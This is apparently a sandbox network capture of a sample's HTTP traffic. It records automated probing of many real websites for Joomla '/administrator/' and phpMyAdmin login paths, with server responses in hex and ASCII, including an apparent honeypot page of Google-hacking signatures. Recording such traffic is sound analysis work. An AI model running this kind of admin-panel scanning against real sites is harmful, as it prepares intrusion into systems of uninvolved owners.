69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-ali
Feb 21, 2024 00:26:09.007591009 CET	1286	IN	Data Raw: 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 7b 6d 61 72 67 69 6e 3a Data Ascii: gn: center;} .link {margin-top: 40px;} .sk-circle {margin: 80px auto;width: 100px;height: 100px;position: relative;} .sk-circle .sk-child {width: 100%;height: 100%;position: absolute;left: 0;top: 0;}
Feb 21, 2024 00:26:09.007669926 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 38 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 31 30 64 65 67 29 3b 2d 6d 73 2d 74 72 61 6e 73 Data Ascii: } .sk-circle .sk-circle8 {-webkit-transform: rotate(210deg);-ms-transform: rotate(210deg);transform: rotate(210deg); } .sk-circle .sk-circle9 {-webkit-transform: rotate(240deg);-ms-transform: rotate(240deg);transform:
Feb 21, 2024 00:26:09.007678032 CET	1286	IN	Data Raw: 72 65 20 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c Data Ascii: re {-webkit-animation-delay: -0.5s;animation-delay: -0.5s; } .sk-circle .sk-circle9:before {-webkit-animation-delay: -0.4s;animation-delay: -0.4s; } .sk-circle .sk-circle10:before {-webkit-animation-delay: -0.3s;animati
Feb 21, 2024 00:26:09.007695913 CET	1286	IN	Data Raw: 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 62 72 6f 77 73 65 72 49 6e 74 65 67 72 69 74 79 43 68 65 63 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 Data Ascii: }, 1000); } function browserIntegrityCheck() { w = window.innerWidth; h = window.innerHeight; arr = [w, h, Math.floor((Math.random() * 9) + 1)]; arr.pus
Feb 21, 2024 00:26:09.007703066 CET	1286	IN	Data Raw: 74 72 69 6e 67 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 73 73 69 62 6c 65 20 3d 20 22 41 42 43 44 45 46 47 48 49 Data Ascii: tring() { var text = ""; var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < 5; i++) text += possible.charAt(Math.floor(Math.
Feb 21, 2024 00:26:09.007755041 CET	1286	IN	Data Raw: 22 63 65 6e 74 65 72 22 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 Data Ascii: "center" valign="middle"> <div> <noscript> <h1 style="color:#990000;">Please, turn Javascript on in your browser then reload the page.</h1> </noscript>
Feb 21, 2024 00:26:09.007797003 CET	1286	IN	Data Raw: 20 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 69 6e 67 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 73 65 63 75 72 65 6c 79 e2 80 a6 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 Data Ascii: <h1>Accessing /phpmyadmin/ securely</h1> <span>This is an automatic process. Your browser will redirect to your requested content in <span id="seconds">5</span> seconds.</span> </di
Feb 21, 2024 00:26:09.007838964 CET	1286	IN	Data Raw: 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 63 6f 6d 5f 61 63 61 6a 6f 6f 6d 2f 20 3c 2f 61 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 27 69 6e 64 65 78 2e 70 68 70 3f 6f 70 74 69 6f 6e 3d 63 6f 6d 5f 63 6f 6e 74 65 6e 74 27 3e 54 68 69 73 20 63 6f Data Ascii: t /components/com_acajoom/ </a><br><a href='index.php?option=com_content'>This contact form is about /components/com_content/ </a><br><a href='index.php?option=com_phocagallery'>This contact form is about /components/com_phocagallery/ </a><b
Feb 21, 2024 00:26:09.007905006 CET	1286	IN	Data Raw: 55 70 6c 6f 61 64 65 72 73 20 54 65 73 74 73 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 61 62 6f 75 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 46 43 4b 65 64 69 74 6f 72 20 2d 20 55 70 6c 6f 61 64 65 72 73 20 54 65 73 74 Data Ascii: Uploaders Tests'>This contact form is about /components/FCKeditor - Uploaders Tests/ </a><br><a href='index.php?option=phpmyadmin'>This contact form is about /components/phpmyadmin/ </a><br><a href='index.php?option=phpmyadmin2'>This contact
Feb 21, 2024 00:26:09.007913113 CET	1080	IN	Data Raw: 72 72 65 6c 4d 61 69 6c 20 76 65 72 73 69 6f 6e 20 31 2e 34 2e 34 26 71 75 6f 74 3b 20 69 6e 75 72 6c 3a 73 72 63 20 65 78 74 3a 70 68 70 29 3c 2f 61 3e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 64 65 6d 6f 2f 3f 47 48 48 20 76 Data Ascii: rrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - WebUtil 2.7">GHDB Signature #1013 ("SquirrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - .mdb/admin.mdb">GHDB S

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.6	56146	178.33.253.225	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.838121891 CET	168	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cfca.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.008542061 CET	357	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://cfca.eu/phpmyadmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.6	56580	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.235249043 CET	175	OUT	GET /administrator/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.333240032 CET	225	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/administrator/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:09.540601015 CET	225	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/administrator/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:10.981929064 CET	394	OUT	GET /administrator/index.php HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://cfgteam.com/administrator/
Feb 21, 2024 00:26:11.079253912 CET	234	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/administrator/index.php ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.6	56579	185.230.63.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.238620043 CET	184	OUT	GET /administrator/ HTTP/1.1 Host: montessorihawaii.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.368292093 CET	847	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Length: 0 Connection: keep-alive location: https://www.montessorihawaii.org/administrator strict-transport-security: max-age=3600 x-wix-request-id: 1708471569.2781478443336126612 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLquxVSF9nMFA2iLo/JtJR4Qa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalqKRhpAPAcicqg9spYbaveOVP0+E0FVY69Zfx0yFLg5YZkMPebZiQLt/0/GYZszyrA==,2UNV7KOq4oGjA5+PKsX47PmOi36p/Q7Ico3sut0FtX4fbJaKSXYQ/lskq2jK6SGP,Av/qWudICkhRTCN8pPYKz67T02HXAs3+PXof1ish5pM=,MP7Bu5+BLGEj45VbG6JkxLgsZcue5LfS7Y8AwDwJeQU=,/j+AjfLiOiE0Vc9NsP8sK9M+eO7SwbESnybcBl/SxK7p7Ig815JIv3PlDeV2T8WsMNdRKgFF4Pt5Hop6v392bA== Cache-Control: no-cache X-Content-Type-Options: nosniff
Feb 21, 2024 00:26:10.934812069 CET	250	OUT	GET /administrator/index.php HTTP/1.1 Host: montessorihawaii.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.montessorihawaii.org/administrator
Feb 21, 2024 00:26:11.061686993 CET	857	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Length: 0 Connection: keep-alive location: https://www.montessorihawaii.org/administrator/index.php strict-transport-security: max-age=3600 x-wix-request-id: 1708471570.9741478443336226612 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLquxVSF9nMFA2iLo/JtJR4Qa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaltD60oxiiTg1Hu0/S4Rf2rfFKMF1/ova9YX8ig4AlelEYN3OeJKxguuFYGStMTT8rg==,2UNV7KOq4oGjA5+PKsX47K15rLvEnClnBsBBVIBt3LYfbJaKSXYQ/lskq2jK6SGP,Av/qWudICkhRTCN8pPYKz67T02HXAs3+PXof1ish5pM=,r2NAdELuKFo4YswPsxLquR8Mf+Wyr6KeUKy8P4sMVGA=,/j+AjfLiOiE0Vc9NsP8sK226sfj9Tto801ToLLpb+tl1V4OGX/SJ61YLSJvJ7C+rk4Ult6Buod0Nwss+aQNj4g== Cache-Control: no-cache X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.6	56571	45.136.114.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.250797987 CET	180	OUT	GET /administrator/ HTTP/1.1 Host: archononline.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.359256983 CET	439	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Feb 21, 2024 00:26:09.418848038 CET	238	OUT	GET /administrator/index.php HTTP/1.1 Host: archononline.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://archononline.com/administrator/
Feb 21, 2024 00:26:09.527064085 CET	439	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.6	56686	13.248.243.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.268039942 CET	186	OUT	GET /administrator/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.380670071 CET	322	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/administrator/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:09 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 21, 2024 00:26:10.700822115 CET	251	OUT	GET /administrator/index.php HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://strategicimpact.com.au/administrator/
Feb 21, 2024 00:26:10.797880888 CET	331	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/administrator/index.php vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:10 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.6	56683	75.2.70.75	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.269134045 CET	175	OUT	GET /administrator/ HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.366516113 CET	352	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/administrator Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
Feb 21, 2024 00:26:11.659742117 CET	232	OUT	GET /administrator/index.php HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.eyegage.com/administrator
Feb 21, 2024 00:26:11.756525993 CET	362	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/administrator/index.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.6	56687	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.269153118 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.368299961 CET	227	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/administrator/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:10.695519924 CET	398	OUT	GET /administrator/index.php HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://blauthlaw.com/administrator/
Feb 21, 2024 00:26:10.794358969 CET	236	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/administrator/index.php ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.6	56518	217.70.184.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.286900043 CET	182	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: network-abilities.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.451297045 CET	1167	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 55 cd 72 db 36 10 be e7 29 50 5e 9c 4c 46 a4 29 d9 b1 d4 a1 98 49 ed 5a 4e 2b 8f 5c 3b b5 27 ba 68 40 70 45 c2 02 01 06 00 45 d1 a7 bc 46 5f af 4f d2 e5 8f 52 39 96 a6 9d f6 02 81 c0 b7 bb d8 6f bf 5d 05 3f 5c cc ce 3f 7d be f9 99 a4 36 13 e1 ab a0 fe 21 4c 50 63 c6 8e 54 bd 47 e3 10 41 65 32 06 19 be 22 24 48 81 c6 f5 06 b7 19 58 4a 58 4a b5 01 3b 76 0a bb ec 0d 9d dd 2b 49 33 18 3b 6b 0e 65 ae b4 75 08 53 d2 82 44 68 c9 63 9b 8e 63 58 73 06 bd e6 63 8f 5d 0c 86 69 9e 5b ae e4 8e e9 a7 94 1b 12 ab 8c 72 d9 e0 48 4a 0d 89 00 24 d1 90 70 63 41 43 4c 4a 6e 53 32 a1 32 e6 ae 04 eb 92 8f 96 a0 15 2b b4 46 1f a2 22 39 d5 2b 84 45 15 b1 29 10 55 4a d0 ee f6 05 96 5b 01 21 9a 95 4a af 7a 34 e2 82 5b 0e c6 65 2a 0b bc f6 b2 05 0a 2e 57 18 54 8c 1d 63 2b 01 26 05 c0 1c 6d 95 e3 db 2d 6c ac c7 0c 52 97 6a 58 8e 9d fa b9 bd b3 e1 f0 e4 64 70 7a ec d6 17 2f 9d a4 c8 11 2b f0 a5 ac 4e b8 b5 5b d2 75 fd e9 e2 b2 75 cd 33 9a 80 b7 e9 35 30 ef 85 9b 1c 57 45 63 87 50 2c df 12 59 fb e6 0a f7 c6 bb ae 57 d0 9a da de 2d 24 85 a0 da 2d d5 72 d9 df 7a af 51 5e 77 c2 b4 32 46 69 9e 70 f9 7f e2 dc 41 c6 7f 52 22 fe f7 81 02 6f 2b b2 20 52 71 d5 c5 8e f9 7a 2b cb 1b ac 1f 97 c9 0d 32 b1 e8 1f f7 07 3d ad 94 5d f4 e3 bc 30 c4 09 83 46 1c 1d 74 26 e2 3b 4b 2d 67 3b 40 ff c3 a4 f2 49 e7 64 e7 fc 4b 7a fd 5b 1f ed 31 52 18 50 8d 46 02 be 0b d9 a2 3b 35 2e 7c fd 61 78 86 06 a9 7f 20 5c a3 97 85 3f 60 f0 ab 13 fe 07 e9 22 13 7e b8 9b f9 f7 fe 51 67 8b c1 99 fc 